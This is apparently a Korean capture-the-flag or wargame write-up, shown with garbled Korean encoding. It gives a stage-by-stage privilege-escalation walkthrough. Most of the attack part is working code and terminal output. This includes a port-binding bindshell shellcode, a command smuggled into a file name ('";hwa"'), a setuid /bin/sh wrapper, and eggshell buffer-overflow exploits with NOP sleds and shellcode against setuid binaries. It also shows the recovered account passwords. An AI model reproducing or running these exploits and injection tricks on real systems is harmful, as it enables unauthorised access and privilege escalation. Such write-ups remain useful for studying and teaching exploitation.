ÇÁ·Î±×·¥À» ½ÇÇàÇÒ¼ö ÀÖ´Â ¹æ¹ýÀÌ ¿©·¯°¡Áö°¡ ÀÖÁö¸¸
´ÙÀ½ÀÇ
¹ÙÀε彩À» ¶ç¿öº¸°Ú½À´Ï´Ù.
char
shellcode[] = /* Taeho Oh bindshell code at port 30464
*/
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31"
"\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46"
"\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0"
"\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10"
"\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb"
"\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46"
"\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9"
"\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f"
"\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88"
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff"
"\xff";
main()
{
__asm__("
movl $shellcode,4(%ebp)");
}
|
ÀÌ°ÍÀ»
ÄÄÆÄÀÏ ÇÏ¿© hwa¶ó´Â ½ÇÇàÆÄÀÏÀ» ¸¸µé¾î ³õ½À´Ï´Ù.
[walwal@localhost
NWSR]$ ls -al
total
24
drwxrwxr-x
2 walwal walwal 4096 Aug 17 23:30 ./
drwxrwx-wt
52 root root 4096 Aug 17 23:31 ../
-rwxrwxr-x
1 walwal walwal 13614 Aug 17 23:30 hwa*
[walwal@localhost
NWSR]$ cd ..
[walwal@localhost
tmp]$ ln -s /tmp/NWSR/hwa hwa -f
[walwal@localhost
tmp]$ cd ~
[walwal@localhost
walwal]$ cd movie
[walwal@localhost
movie]$ date
Sat
Aug 17 23:32:43 EDT 2002
[walwal@localhost
movie]$ touch 08172235 "\";hwa\""
<-- ¾à 1½Ã°£ ÀÌÀüÀÇ ÆÄÀÏ·Î ¸¸µé¾î ³õ´Â´Ù.
|
¸®¸ðÅÍ¿¡¼
¹ÙÀε彩ÀÌ µ¿ÀÛÀ» Çߴ°¡ È®ÀÎÇÑ´Ù.
[root@localhost
root]# nc 211.215.55.247 30464
id
uid=1001(guta)
gid=1001(guta) groups=1001(guta) <-- ¹ÙÀε彩·Î gutaÀÇ
±ÇÇÑÀ» ¾ò¾ú´Ù.
ls
-al
total
64
-rw-rw-r--
1 walwal walwal 0 Aug 17 2002 ";chmod 644 asd"
-rw-rw-r--
1 walwal walwal 0 Aug 17 16:40 ";cp f1 f2"
-rw-rw-r--
1 walwal walwal 0 Aug 17 16:58 ";hwa"
-rw-rw-r--
1 walwal walwal 5 Aug 17 17:38 f1
-rw-r--r--
1 guta guta 5 Aug 17 17:58 f2
|
·ÎÄ÷Î
µ¹¾Æ¿Í¼..
[walwal@localhost
movie]$ cat > gta.c
#include
<stdio.h>
#include
<unistd.h>
#include
<sys/types.h>
main()
{
setreuid(1001,1001);
setregid(1001,1001);
system("/bin/sh");
}
|
¸®¸ðÅÍ·Î
ÀÛ¾÷À» ÇϱⰡ ºÒÆíÇϱ⠶§¹®¿¡ LocalÀÇ ±ÇÇÑÀ» ȹµæÇϱâ À§ÇÏ¿©
°£´ÜÇÑ
½©À» ¸¸µç´Ù.
ÀÌ°ÍÀ»
¸®¸ðÅÍ¿¡¼ ÄÄÆÄÀÏ ÇÑ´Ù.
cd
/tmp/NWSR
gcc
gta.c -o gta
ls
-al
total
48
drwxrwxrwx
2 guest guest 4096 Aug 18 00:36 .
drwxrwx-wt
138 root root 8192 Aug 18 00:29 ..
-rwxrwxr-x
1 walwal walwal 13648 Aug 18 00:17 hwa
-rwxr-xr-x
1 guta guta 13738 Aug 18 00:36 gta
-rw-rw-r--
1 walwal walwal 142 Aug 18 00:34 gta.c
chmod
6755 gta
ls
total
48
drwxrwxrwx
2 guest guest 4096 Aug 18 00:36 .
drwxrwx-wt
138 root root 8192 Aug 18 00:29 ..
-rwxrwxr-x
1 walwal walwal 13648 Aug 18 00:17 hwa
-rwsr-sr-x
1 guta guta 13738 Aug 18 00:36 gta
-rw-rw-r--
1 walwal walwal 142 Aug 18 00:34 gta.c
cd
SolveMe
ls
-al
total
28
drwxr-x---
2 root guta 4096 Aug 16 19:26 .
drwxr-x---
3 root guta 4096 Aug 16 19:26 ..
-r-s--sr-x
1 mungmung mungmung 18124 Aug 16 18:37 student
|
´Ù½Ã
Local·Î µ¹¾Æ¿Í¼...
[walwal@localhost
NWSR]$ ls -al
total
48
drwxrwxrwx
2 guest guest 4096 Aug 18 00:36 ./
drwxrwx-wt
138 root root 8192 Aug 18 00:29 ../
-rwxrwxr-x
1 walwal walwal 13648 Aug 18 00:17 hwa*
-rwsr-sr-x
1 guta guta 13738 Aug 18 00:36 gta*
-rw-rw-r--
1 walwal walwal 142 Aug 18 00:34 gta.c
[walwal@localhost
NWSR]$ ./gta
sh-2.05a$
id
uid=1001(guta)
gid=1001(guta) groups=1000(walwal)
|
µåµð¾î
Local¿¡¼ gutaÀÇ ±ÇÇÑÀ» ȹµæÇß´Ù.
-
´ëȸ µµÁß °ø°³µÈ mungmung ±ÇÇÑ È¹µæ ÈùÆ®.
*
mungmung ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®ÀÔ´Ï´Ù. [ student.c ]
|
sh-2.05a$
cd /home/guta
sh-2.05a$
ls -al
total
24
drwxr-x---
2 root guta 4096 Aug 16 19:26 SolveMe
sh-2.05a$
cd SolveMe
sh-2.05a$
ls -al
total
28
-r-s--sr-x
1 mungmung mungmung 18124 Aug 16 18:37 student
sh-2.05a$
objdump -x student
08048dac
g F .text 000000b3 search_list
08048418
F *UND* 0000030a system@@GLIBC_2.0
08048eec
g F .text 00000069 clean_list
080483c0
g F .init 00000000 _init
08048428
F *UND* 00000270 malloc@@GLIBC_2.0
08048438
F *UND* 00000034 scanf@@GLIBC_2.0
08048448
w F *UND* 00000025
__deregister_frame_info@@GLIBC_2.0
0804a5e4
g O .bss 00000004 tail
0804a5e8
g O .bss 00000004 head
08048d10
g F .text 00000063 create_list
080484b0
g F .text 00000000 _start
08048458
F *UND* 000000af strlen@@GLIBC_2.0
0804a5cc
g O *ABS* 00000000 __bss_start
080485b0
g F .text 0000075e main
08048468
F *UND* 000000d3 __libc_start_main@@GLIBC_2.0
0804a4a0
w .data 00000000 data_start
08048478
F *UND* 00000032 printf@@GLIBC_2.0
08048fa0
g F .fini 00000000 _fini
08048488
F *UND* 00000027 memcpy@@GLIBC_2.0
0804a5cc
g O *ABS* 00000000 _edata
08048d74
g F .text 00000038 insert_list
0804a58c
g O .got 00000000 _GLOBAL_OFFSET_TABLE_
08048498
F *UND* 000000f4 free@@GLIBC_2.0
0804a5ec
g O *ABS* 00000000 _end
08048fc4
g O .rodata 00000004 _IO_stdin_used
0804a4a0
g .data 00000000 __data_start
00000000
w *UND* 00000000 __gmon_start__
sh-2.05a$
objdump -s student
Contents
of section .fini:
8048fa0
5589e553 52e80000 00005b81 c3e21500 U..SR.....[.....
8048fb0
008d7600 e847f5ff ff8b5dfc c9c3 ..v..G....]...
Contents
of section .rodata:
8048fc0
03000000 01000200 00000000 00000000 ................
8048fd0
00000000 00000000 00000000 00000000 ................
8048fe0
2f757372 2f62696e 2f636c65 61720000 /usr/bin/clear..
8048ff0
00000000 00000000 00000000 00000000 ................
8049000
0a2d20bc bac0fbc7 a5202d2d 2d2d2d2d .- ...... ------
8049110
b4cfb1ee 3f0a3e20 00257300 00000000 ....?.> .%s.....
8049120
b0e6b0ed 21205374 61636b20 6f766572 ....! Stack over
8049130
666c6f77 20b0a120 bdc3b5b5 b5c7befa flow .. ........
8049460
c7d220c7 d0bbfdc0 c720b9f8 c8a3b4c2 .. ...... ......
8049470
20b9abbe f9c0d4b4 cfb1ee3f 0a3e2000 ..........?.>
.
8049480
0a0a000a 00000000 cdcca841 00000000 ...........A....
8049490
00000000 00000000 00000000 00000000 ................
|
¹Ù·Î
»ðÁú ½ÃÀÛ...
sh-2.05a$
ln -s /home/guta/SolveMe/student student
sh-2.05a$
./student
-
¼ºÀûÇ¥ --------------------
ÇöÀç
0 ¸íÀÇ Çлý Á¤º¸°¡ ÀÖ½À´Ï´Ù.
1.
Çлý ¼ºÀû ÀÔ·ÂÇϱâ
2.
À̸§À¸·Î Çлý ã¾Æº¸±â
3.
¹øÈ£·Î Çлý ã¾Æº¸±â
4.
¸ðµç ÇлýÀÇ Á¤º¸ º¸±â
5.
³¡³»±â
¼±ÅÃÇϼ¼¿ä>
5
ÇÁ·Î±×·¥À»
Á¾·áÇÕ´Ï´Ù.
sh-2.05a$
(perl -e 'print "1\n","i"x256')|./student
-
¼ºÀûÇ¥ --------------------
ÇöÀç
0 ¸íÀÇ Çлý Á¤º¸°¡ ÀÖ½À´Ï´Ù.
1.
Çлý ¼ºÀû ÀÔ·ÂÇϱâ
2.
À̸§À¸·Î Çлý ã¾Æº¸±â
3.
¹øÈ£·Î Çлý ã¾Æº¸±â
4.
¸ðµç ÇлýÀÇ Á¤º¸ º¸±â
5.
³¡³»±â
¼±ÅÃÇϼ¼¿ä>
»õ·Î¿î
ÇлýÀ» µî·ÏÇÕ´Ï´Ù.
ÇлýÀÇ
À̸§Àº ¹«¾ùÀԴϱî?
>°æ°í!
Stack overflow °¡ ½ÃµµµÇ¾ú½À´Ï´Ù.
º¸¾È»óÀÇ
¹®Á¦·Î Á¾·áÇÕ´Ï´Ù.
Segmentation
fault
sh-2.05a$
|
¿¡±×½©
ÀÛ¼º.
sh-2.05a$
cat > egg.c
#include
<stdio.h>
#include
<stdlib.h>
#include
<unistd.h>
#include
<string.h>
#define
DEFAULT_EGG_SIZE 1024
#define
NOP 0x90
char
shellcode[]=
"\x31\xc0"
/* xor %eax,%eax */
"\xb0\xea"
/* mov $0xea,%al */
"\xb4\x03"
/* mov $0x3,%ah */
"\x89\xc3"
/* mov %eax,%ebx */
"\x89\xd9"
/* mov %ebx,%ecx */
"\x31\xc0"
/* xor %eax,%eax */
"\xb0\x46"
/* mov $0x46,%al */
"\xcd\x80"
/* int $0x80 */
"\x31\xc0"
/* xor %eax,%eax */
"\xb0\xea"
/* mov $0xea,%al */
"\xb4\x03"
/* mov $0x3,%ah */
"\x89\xc3"
/* mov %eax,%ebx */
"\x89\xd9"
/* mov %ebx,%ecx */
"\x31\xc0"
/* xor %eax,%eax */
"\xb0\x47"
/* mov $0x47,%al */
"\xcd\x80"
/* int $0x80 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main(int argc, char *argv[])
{
char
*buff, *ptr, *egg;
int
*aptr, addr, i;
int
esize=DEFAULT_EGG_SIZE;
if
(!(egg = malloc(esize))) { // Egg Shell¿ë Buffer
printf("Can't
allocate memory.\n");
exit(0);
}
ptr
= egg; // Egg ShellÀ» ¸¸µë
for
(i = 0; i < esize - strlen(shellcode) - 1; i++) *(ptr++)
= NOP;
for
(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[esize
- 1] = '\0';
memcpy(egg,"EGG=",4);
// EGG¶ó´Â ȯ°æº¯¼ö ¼³Á¤
putenv(egg);
system("/bin/bash");
// Shell ½ÇÇà
}
sh-2.05a$
gcc egg.c -o egg
|
sh-2.05a$
./egg
[guta@localhost
NWSR]$ (perl -e 'print "1\n","\x58\xfb\xff\xbf"x64';cat)|./student
-
¼ºÀûÇ¥ --------------------
ÇöÀç
0 ¸íÀÇ Çлý Á¤º¸°¡ ÀÖ½À´Ï´Ù.
1.
Çлý ¼ºÀû ÀÔ·ÂÇϱâ
2.
À̸§À¸·Î Çлý ã¾Æº¸±â
3.
¹øÈ£·Î Çлý ã¾Æº¸±â
4.
¸ðµç ÇлýÀÇ Á¤º¸ º¸±â
5.
³¡³»±â
¼±ÅÃÇϼ¼¿ä>
»õ·Î¿î
ÇлýÀ» µî·ÏÇÕ´Ï´Ù.
ÇлýÀÇ
À̸§Àº ¹«¾ùÀԴϱî?
>°æ°í!
Stack overflow °¡ ½ÃµµµÇ¾ú½À´Ï´Ù.
º¸¾È»óÀÇ
¹®Á¦·Î Á¾·áÇÕ´Ï´Ù.
id
uid=1002(mungmung)
gid=1002(mungmung) groups=1000(walwal)
[guta@localhost
NWSR]$ register
[01:59]
°íÀ¯ ¹øÈ£¸¦ ÀÔ·ÂÇϼ¼¿ä: #H4SC30346
mungmungÀÇ
ºñ¹Ð ¹øÈ£´Â rownrdl ÀÔ´Ï´Ù.
|
-
´ëȸ µµÁß °ø°³µÈ wizard ±ÇÇÑ ÈùÆ®.
*
wizard ±ÇÇÑ °ü·Ã ÈùÆ®ÀÔ´Ï´Ù. [ Use_Brain.c ]
|
[mungmung@localhost
mungmung]$ ls -al
total
24
dr-xr-x---
2 root mungmung 4096 Aug 16 19:28 SolveMe/
[mungmung@localhost
mungmung]$ cd SolveMe
[mungmung@localhost
SolveMe]$ ls -al
total
24
-rwsr-sr-x
1 wizard wizard 14215 Aug 16 01:18 Use_Brain*
[mungmung@localhost
NWSR]$ ln -s /home/mungmung/SolveMe/Use_Brain Use_Brain
¹®Á¦ºÐ¼®...
[mungmung@localhost
NWSR]$ objdump -x ./Use_Brain
08048640
g O .rodata 00000004 _fp_hw
08048520
g F .text 0000002f hackerschool
08049780
w O .bss 00000004 environ@@GLIBC_2.0
08048380
g F .init 00000000 _init
080483b8
w F *UND* 00000025
__deregister_frame_info@@GLIBC_2.0
08048420
g F .text 00000000 _start
080483c8
F *UND* 00000140 fgets@@GLIBC_2.0
080483d8
F *UND* 000000af strlen@@GLIBC_2.0
08049780
g O *ABS* 00000000 __bss_start
08048550
g F .text 00000087 main
080483e8
F *UND* 000000d3 __libc_start_main@@GLIBC_2.0
08049780
g O .bss 00000004 __environ@@GLIBC_2.0
08049668
w .data 00000000 data_start
080483f8
F *UND* 00000032 printf@@GLIBC_2.0
08048620
g F .fini 00000000 _fini
08049780
g O *ABS* 00000000 _edata
08049754
g O .got 00000000 _GLOBAL_OFFSET_TABLE_
080497a0
g O *ABS* 00000000 _end
08048408
F *UND* 00000043 memset@@GLIBC_2.0
08049784
g O .bss 00000004 stdin@@GLIBC_2.0
08048644
g O .rodata 00000004 _IO_stdin_used
08049668
g .data 00000000 __data_start
[mungmung@localhost
NWSR]$ objdump -s ./Use_Brain
Contents
of section .fini:
8048620
5589e553 52e80000 00005b81 c32a1100 U..SR.....[..*..
8048630
008d7600 e837feff ff8b5dfc c9c3 ..v..7....]...
Contents
of section .rodata:
8048640
03000000 01000200 bfa9b1e2 bcad20c0 .............. .
8048650
d4b7c2c7 d8bedfc7 d8bfe42e 203a2000 ............ : .
8048660
45786974 2e0a00 Exit...
|
[mungmung@localhost
SolveMe]$ gdb Use_Brain ¿¡¼ µð½º¾î¼ÀÀ» ÇÏ¿©..¼Ò½º¸¦
¸¸µë.
void
hackerschool()
{
fffc[8];
0x8048520
<hackerschool>: push %ebp
0x8048521
<hackerschool+1>: mov %esp,%ebp
0x8048523
<hackerschool+3>: sub $0x8,%esp
printf("¿©±â¼
ÀÔ·ÂÇؾßÇØ¿ä. ");
0x8048526
<hackerschool+6>: sub $0xc,%esp
0x8048529
<hackerschool+9>: push $0x8048648
0x804852e
<hackerschool+14>: call 0x80483f8 <printf>
0x8048533
<hackerschool+19>: add $0x10,%esp
fgets(fffc,
0x0d, stdin);
0x8048536
<hackerschool+22>: sub $0x4,%esp
0x8048539
<hackerschool+25>: pushl 0x8049784
0x804853f
<hackerschool+31>: push $0xd
0x8048541
<hackerschool+33>: lea 0xfffffffc(%ebp),%eax
0x8048544
<hackerschool+36>: push %eax
0x8048545
<hackerschool+37>: call 0x80483c8 <fgets>
0x804854a
<hackerschool+42>: add $0x10,%esp
}
0x804854d
<hackerschool+45>: leave
0x804854e
<hackerschool+46>: ret
int
main(int argc, char *argv[])
{
0x8048550
<main>: push %ebp
0x8048551
<main+1>: mov %esp,%ebp
0x8048553
<main+3>: sub $0x8,%esp
if
(argc>1) {
0x8048556
<main+6>: cmpl $0x1,0x8(%ebp)
0x804855a
<main+10>: jle 0x8048574 <main+36>
0x804855c
<main+12>: sub $0xc,%esp
printf("Exit.\n");
0x804855f
<main+15>: push $0x8048660
0x8048564
<main+20>: call 0x80483f8 <printf>
0x8048569
<main+25>: add $0x10,%esp
return(0);
0x804856c
<main+28>: mov $0x0,%eax
0x8048571
<main+33>: jmp 0x80485d5 <main+133>
0x8048573
<main+35>: nop
0x8048574
<main+36>: nop
}
for(fffc
= 0; environ[fffc]; fffc++) {
0x8048575
<main+37>: movl $0x0,0xfffffffc(%ebp)
0x804857c
<main+44>: mov 0xfffffffc(%ebp),%eax
0x804857f
<main+47>: imul $0x4,%eax,%edx
0x8048582
<main+50>: mov 0x8049780,%eax <-- environ@@GLIBC_2.0
0x8048587
<main+55>: cmpl $0x0,(%eax,%edx,1)
0x804858b
<main+59>: jne 0x8048590 <main+64>
0x804858d
<main+61>: jmp 0x80485d0 <main+128>
0x804858f
<main+63>: nop
strlen(environ[fffc]);
0x8048590
<main+64>: sub $0x4,%esp
0x8048593
<main+67>: sub $0x8,%esp
0x8048596
<main+70>: mov 0xfffffffc(%ebp),%eax
0x8048599
<main+73>: imul $0x4,%eax,%edx
0x804859c
<main+76>: mov 0x8049780,%eax
0x80485a1
<main+81>: pushl (%eax,%edx,1)
0x80485a4
<main+84>: call 0x80483d8 <strlen>
0x80485a9
<main+89>: add $0xc,%esp
memset(environ[fffc],
0, strlen(environ[fffc]));
0x80485ac
<main+92>: mov %eax,%eax
0x80485ae
<main+94>: push %eax
0x80485af
<main+95>: push $0x0
0x80485b1
<main+97>: mov 0xfffffffc(%ebp),%eax
0x80485b4
<main+100>: imul $0x4,%eax,%edx
0x80485b7
<main+103>: mov 0x8049780,%eax
0x80485bc
<main+108>: pushl (%eax,%edx,1)
0x80485bf
<main+111>: call 0x8048408 <memset>
0x80485c4
<main+116>: add $0x10,%esp
fffc++
0x80485c7
<main+119>: lea 0xfffffffc(%ebp),%eax
0x80485ca
<main+122>: incl (%eax)
0x80485cc
<main+124>: jmp 0x804857c <main+44>
0x80485ce
<main+126>: mov %esi,%esi
}
hackerschool();
0x80485d0
<main+128>: call 0x8048520 <hackerschool>
}
0x80485d5
<main+133>: leave
0x80485d6
<main+134>: ret
|
Use_Brain
¼Ò½º À¯Ãß...
hackerschool()
{
char
buf[8];
printf("¿©±â¼
ÀÔ·ÂÇؾßÇØ¿ä. ");
fgets(buf,
13, stdin);
}
main(int
argc, char **argv)
{
int
fffc;
if(argc
> 1){
printf("Exit.\n");
exit(0);
}
for(fffc
= 0; environ[fffc]; fffc++) {
memset(environ[fffc],
0, strlen(environ[fffc]));
}
hackerschool();
}
|
±×·¸´Ù¸é...¿¡±×½©À»
³ÖÀ» °÷Àº only argv[0];
wizard
exploit
[mungmung@localhost
NWSR]$ cat > mng.c
#include<stdio.h>
#define
NOP 0x90
char
shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x89\xc3\x89\xd9\xb0\x46\x66\xbb\xeb\x03\x66\xb9\xeb\x03"
"\xcd\x80\x31\xc0\x89\xc3\x89\xd9\xb0\x47\x66\xbb\xeb\x03\x66\xb9"
"\xeb\x03\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main(int argc, char **argv)
{
char
*buff, *ptr, *egg;
int
i, eggsize=1024;
char
*run_path = "./Use_Brain";
if
( argc > 1 ) eggsize = atoi(argv[1]);
if
( !(egg = malloc(eggsize))) {
printf("Can't
allocate memory for eggsize");
exit(0);
}
ptr
= egg;
for(i
= 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++)
= NOP;
for(i
= 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[eggsize
- 1] = '\0';
execl(run_path,
egg, NULL);
}
[mungmung@localhost
NWSR]$ gcc mng.c -o mng
|
gdb·Î
È®ÀÎ...
(gdb)
x/16 $ebp
0xbffffb48:
0xbffffb88 0x42017499 0x00000001 0xbffffbb4
0xbffffb58:
0xbffffbbc 0x08048396 0x08048620 0x00000000
0xbffffb68:
0xbffffb88 0x42017482 0x00000000 0xbffffbbc
0xbffffb78:
0x08049780 0x400134c0 0x00000001 0x08048420
0xbffffc78:
0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc88:
0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffffc98:
0x6e756d2f 0x6e756d67 0x6f532f67 0x4d65766c
0xbffffca8:
0x73552f65 0x72425f65 0x006e6961 0x3d445750
0xbffffcb8:
0x706d742f 0x756d2e2f 0x5200676e 0x544f4d45
[mungmung@localhost
NWSR]$ (perl -e 'print "\x2c\xfc\xff\xbf"x3';cat)|./mng
id
uid=1003(wizard)
gid=1003(wizard) groups=1002(mungmung)
[mungmung@localhost
NWSR]$ register
°íÀ¯
¹øÈ£¸¦ ÀÔ·ÂÇϼ¼¿ä: #H4SC30346
wizardÀÇ
ºñ¹Ð ¹øÈ£´Â qufemfdmlwjswod(º°µéÀÇÀüÀï) ÀÔ´Ï´Ù.
µî·Ï
ó¸® ¿Ï·áµÇ¾ú½À´Ï´Ù.
|
----------------------------------------------------------------
1.
¼ö¼ö²²³¢ ¹®Á¦ : À̹ø ¼ö¼ö²²³¢ ¹®Á¦´Â ¿ª¾ÏÈ£ÈÀÔ´Ï´Ù.
crypt
group ±ÇÇÑÀÇ ÆÄÀÏÀ» ã¾Æ ¾ÏÈ£¸¦ Çص¶Çϸé
crypt
°èÁ¤ÀÇ Æнº¿öµå¸¦ ¾òÀ¸½Ç ¼ö ÀÖ½À´Ï´Ù.
----------------------------------------------------------------
|
gdb·Î
µð¹ö±ë.
08048510
<main>:
8048510:
55 push %ebp
8048511:
89 e5 mov %esp,%ebp
8048513:
57 push %edi
8048514:
56 push %esi
8048515:
83 ec 60 sub $0x60,%esp
8048518:
8d 7d d8 lea 0xffffffd8(%ebp),%edi
804851b:
be 58 86 04 08 mov $0x8048658,%esi
8048520:
fc cld
8048521:
b9 15 00 00 00 mov $0x15,%ecx
8048526:
f3 a4 repz movsb %ds:(%esi),%es:(%edi)
8048528:
c6 45 ed 00 movb $0x0,0xffffffed(%ebp)
804852c:
8d 7d b8 lea 0xffffffb8(%ebp),%edi
804852f:
be 6d 86 04 08 mov $0x804866d,%esi
8048534:
fc cld
8048535:
b9 15 00 00 00 mov $0x15,%ecx
804853a:
f3 a4 repz movsb %ds:(%esi),%es:(%edi)
804853c:
c6 45 cd 00 movb $0x0,0xffffffcd(%ebp)
8048540:
8d 7d a8 lea 0xffffffa8(%ebp),%edi
8048543:
be 82 86 04 08 mov $0x8048682,%esi
8048548:
fc cld
8048549:
b9 0d 00 00 00 mov $0xd,%ecx
804854e:
f3 a4 repz movsb %ds:(%esi),%es:(%edi)
8048550:
83 ec 08 sub $0x8,%esp
8048553:
68 d4 85 04 08 push $0x80485d4
8048558:
6a 03 push $0x3
804855a:
e8 35 fe ff ff call 8048394 <_init+0x48>
804855f:
83 c4 10 add $0x10,%esp
8048562:
83 ec 08 sub $0x8,%esp
8048565:
68 d4 85 04 08 push $0x80485d4
804856a:
6a 02 push $0x2
804856c:
e8 23 fe ff ff call 8048394 <_init+0x48>
8048571:
83 c4 10 add $0x10,%esp
8048574:
83 ec 0c sub $0xc,%esp
8048577:
68 8f 86 04 08 push $0x804868f
804857c:
e8 23 fe ff ff call 80483a4 <_init+0x58>
8048581:
83 c4 10 add $0x10,%esp
8048584:
89 45 a4 mov %eax,0xffffffa4(%ebp)
8048587:
83 ec 08 sub $0x8,%esp
804858a:
ff 75 a4 pushl 0xffffffa4(%ebp)
804858d:
8d 45 a8 lea 0xffffffa8(%ebp),%eax
8048590:
83 c0 05 add $0x5,%eax
8048593:
50 push %eax
8048594:
e8 eb fd ff ff call 8048384 <_init+0x38>
8048599:
83 c4 10 add $0x10,%esp
804859c:
89 c0 mov %eax,%eax
804859e:
85 c0 test %eax,%eax
80485a0:
74 1a je 80485bc <main+0xac>
80485a2:
83 ec 0c sub $0xc,%esp
80485a5:
68 9a 86 04 08 push $0x804869a
80485aa:
e8 35 fe ff ff call 80483e4 <_init+0x98>
80485af:
83 c4 10 add $0x10,%esp
80485b2:
83 ec 0c sub $0xc,%esp
80485b5:
6a ff push $0xffffffff
80485b7:
e8 38 fe ff ff call 80483f4 <_init+0xa8>
80485bc:
83 ec 0c sub $0xc,%esp
80485bf:
68 a8 86 04 08 push $0x80486a8
80485c4:
e8 1b fe ff ff call 80483e4 <_init+0x98>
80485c9:
83 c4 10 add $0x10,%esp
80485cc:
8d 65 f8 lea 0xfffffff8(%ebp),%esp
80485cf:
5e pop %esi
80485d0:
5f pop %edi
80485d1:
5d pop %ebp
80485d2:
c3 ret
80485d3:
90 nop
080485d4
<handler>:
80485d4:
55 push %ebp
80485d5:
89 e5 mov %esp,%ebp
80485d7:
83 ec 08 sub $0x8,%esp
80485da:
83 ec 08 sub $0x8,%esp
80485dd:
68 b1 86 04 08 push $0x80486b1
80485e2:
ff 75 08 pushl 0x8(%ebp)
80485e5:
e8 da fd ff ff call 80483c4 <_init+0x78>
80485ea:
83 c4 10 add $0x10,%esp
80485ed:
c9 leave
80485ee:
c3 ret
80485ef:
90 nop
(gdb)
x/16 0x0804868f
0x804868f
<_IO_stdin_used+59>: "Password: "
0x804869a
<_IO_stdin_used+70>: "\nƲ·È½À´Ï´Ù.\n"
0x80486a8
<_IO_stdin_used+84>: "\n¼º°ø!!\n"
0x80486b1
<_IO_stdin_used+93>: "\n°ÅºÎ\n"
(gdb)
x/16 0x08048658
0x8048658
<_IO_stdin_used+4>: "@#!!levelup_pass!!@#"
0x804866d
<_IO_stdin_used+25>: "@#!!uplevel_pass!!@#"
0x8048682
<_IO_stdin_used+46>: "loohcsrekcah"
0x804868f
<_IO_stdin_used+59>: "Password: "
0x804869a
<_IO_stdin_used+70>: "\nƲ·È½À´Ï´Ù.\n"
0x80486a8
<_IO_stdin_used+84>: "\n¼º°ø!!\n"
0x80486b1
<_IO_stdin_used+93>: "\n°ÅºÎ\n"
(gdb)
x/s $esi
0x804865b
<_IO_stdin_used+7>: "!levelup_pass!!@#"
loohcsrekcah
(gdb)
x/16 $eax
0xbffffb30:
0x686f6f6c 0x65727363 0x6861636b
(gdb)
x/16 $eax
0xbffffb30:
0x686f6f6c 0x65727363 0x6861636b
8048590:
83 c0 05 add $0x5,%eax
8048593:
50 push %eax
8048594:
e8 eb fd ff ff call 8048384 <_init+0x38>
¿ä
ºÎºÐÀÌ ÇÙ½É.
(gdb)
x/16 $eax
0xbffffb35:
"srekcah"
0xbffffb3d:
"=\001@@#!!uplevel_pass!!@#"
0xbffffb55:
""
crypt
Æнº¿öµå : srekcah
|
----------------------------------------------------------------
2.
°ü¸®ÀÚÀÇ È¸é ĸÃÄ :
°ü¸®ÀÚ°¡
½Ç¼ö·Î °¡»ó ÄÜ¼Ö ½ºÅ©¸° °ü·Ã ÆÄÀÏÀÇ Àбâ Æ۹̼ÇÀ» ¿¾î
³õ¾Ò´Ù°í
ÇÕ´Ï´Ù. ÀÌ Á¤º¸¸¦ ÀÌ¿ëÇÏ¿© °ü¸®ÀÚÀÇ È¸éÀ» ĸÃÄÇϼ¼¿ä.
----------------------------------------------------------------
|
<½ºÅ©¸°
´ýÇÁ Âü°í ³»¿ë>
ÇöÀç
µð·ºÅ丮¿¡ screen.dump¶ó´Â ÈÀÏ·Î /dev/ttyNÀÇ È¸é ³»¿ëÀ»
´ýÇÁÇÏ·Á¸é
setterm -dump N ¶ó°í ÇÏ¸é µÈ´Ù. setterm(1)À» ÂüÁ¶Ç϶ó.
/dev/ttyN
½ºÅ©¸°ÀÇ ÇöÀç ³»¿ëÀº /dev/vcsN µð¹ÙÀ̽º¸¦ »ç¿ëÇÏ¸é ¾×¼¼½ºÇÒ
¼ö
